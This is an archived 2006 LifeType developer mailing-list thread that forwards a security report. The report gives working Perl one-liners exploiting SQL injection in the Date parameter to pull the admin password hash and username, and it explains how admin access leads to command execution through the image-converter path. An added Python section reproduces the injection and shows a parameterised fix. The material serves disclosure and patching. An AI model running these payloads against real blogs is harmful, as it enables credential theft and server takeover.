[pLog-svn] Fwd: Security problem

Mark Wu markplace at gmail.com
Mon Jul 3 16:23:15 GMT 2006


Yes, I think I can confirm this.

I remember I fixed this bug in 1.1 some time ago.... But I didn't know someone could
use it to inject SQL ...

We need to backport the fix from 1.1 to 1.0, too.

That means we will have a 1.0.6 soon.

Mark 

> -----Original Message-----
> From: plog-svn-bounces at devel.lifetype.net 
> [mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of 
> Oscar Renalias
> Sent: Monday, July 03, 2006 11:58 PM
> To: plog-svn at devel.lifetype.net
> Subject: [pLog-svn] Fwd: Security problem
> 
> Can somebody quickly investigate this?
> 
> ---------- Forwarded message ----------
> From: A. Ramos <aramosf at unsec.net>
> Date: Jul 3, 2006 5:45 PM
> Subject: Security problem
> To: contact at lifetype.net
> 
> 
> Hello :-)
> 
> There is one SQL injection in the latest version of LifeType:
> 
> 
> To get the md5 password:
> perl -MLWP::Simple -e "getprint 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'" \
>   | perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
> 
> To get the admin username:
> perl -MLWP::Simple -e "getprint 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'" \
>   | perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
> 
> And if you can access the admin control panel, you can run 
> commands on the system by changing the value of /usr/bin/convert 
> and putting your own command there. Upload some picture and wait 
> for it to be resized with the evil command.
> 
> I think there are more bugs but I haven't time to check for more.
> 
> Thank you.
> 
> --
> 
> A. Ramos  <aka dab>
> mailto: <aramosf at unsec.net>
> http://www.unsec.net
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn
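The report above only shows the attack URLs. The following is an added example, not code from LifeType or from the reporter, that reproduces the mechanics of the Date parameter injection against an in-memory SQLite database and shows the fix that a backport to 1.0 needs to carry. The lt_users table with id, user and password columns is taken from the report; the ten-column lt_articles table, its column names, the LIKE-based date filter and the function names are assumptions chosen so that the reporter's 10-column UNION SELECT lines up with the original query. The password hash is a constructed value.

```python
import re
import sqlite3

# Payload from the report, URL-decoded. In MySQL (and SQLite) the trailing /*
# opens a comment that swallows the rest of the original query.
PAYLOAD = "200607' UNION SELECT 1,password,1,1,1,1,1,1,1,1 FROM lt_users WHERE id='1'/*"

# Ten columns, matching the ten values in the reporter's UNION SELECT.
# The column names are an assumption, not LifeType's real schema.
COLS = ("id, article_id, blog_id, date, title, text, "
        "author_id, status, num_comments, slug")


def build_db():
    """Constructed sample database: one admin user and one article."""
    conn = sqlite3.connect(":memory:")
    c = conn.cursor()
    c.execute("CREATE TABLE lt_users (id INTEGER, user TEXT, password TEXT)")
    # md5('password'); a constructed sample hash, not real data.
    c.execute("INSERT INTO lt_users VALUES (1, 'admin', "
              "'5f4dcc3b5aa765d61d8327deb882cf99')")
    c.execute("CREATE TABLE lt_articles (id INTEGER, article_id INTEGER, "
              "blog_id INTEGER, date TEXT, title TEXT, text TEXT, "
              "author_id INTEGER, status INTEGER, num_comments INTEGER, "
              "slug TEXT)")
    c.execute("INSERT INTO lt_articles VALUES (1, 42, 1, '20060701', 'Hello', "
              "'body', 1, 1, 0, 'hello')")
    conn.commit()
    return conn


def articles_vulnerable(conn, date, blog_id):
    """Hypothetical reconstruction of the flawed pattern: the Date request
    parameter is pasted straight into the SQL string."""
    sql = ("SELECT %s FROM lt_articles WHERE date LIKE '%s%%' AND blog_id = %d"
           % (COLS, date, int(blog_id)))
    return conn.execute(sql).fetchall()


def leak_via_union(conn):
    """Run the reporter's payload against the vulnerable query and return
    what lands in column 2, which the original page rendered as articleId."""
    rows = articles_vulnerable(conn, PAYLOAD, 1)
    return rows[0][1]


# Date is a YYYY, YYYYMM or YYYYMMDD prefix; anything else is rejected.
DATE_RE = re.compile(r"\d{4}(\d{2}){0,2}")


def articles_safe(conn, date, blog_id):
    """Hardened version: validate the shape of Date, then bind both values
    as parameters so the database never parses attacker text as SQL."""
    if not DATE_RE.fullmatch(date):
        raise ValueError("Date must be YYYY, YYYYMM or YYYYMMDD")
    sql = "SELECT %s FROM lt_articles WHERE date LIKE ? AND blog_id = ?" % COLS
    return conn.execute(sql, (date + "%", int(blog_id))).fetchall()


def safe_rejects(conn, date):
    """True if the hardened query refuses the given Date value."""
    try:
        articles_safe(conn, date, 1)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("leaked via UNION:", leak_via_union(db))
    print("hardened rejects payload:", safe_rejects(db, PAYLOAD))
    print("hardened normal result:", articles_safe(db, "200607", 1))
```

The reporter's regex pulls the leaked value out of the articleId link because the injected second column takes the place of the article id in the rendered page; the simulation just returns the row so the same value shows up at index 1. Parameter binding alone would already stop the UNION (the payload would become a literal date string and match nothing), but the format check is worth keeping as well, since it turns a malformed request into an error instead of a silent empty page.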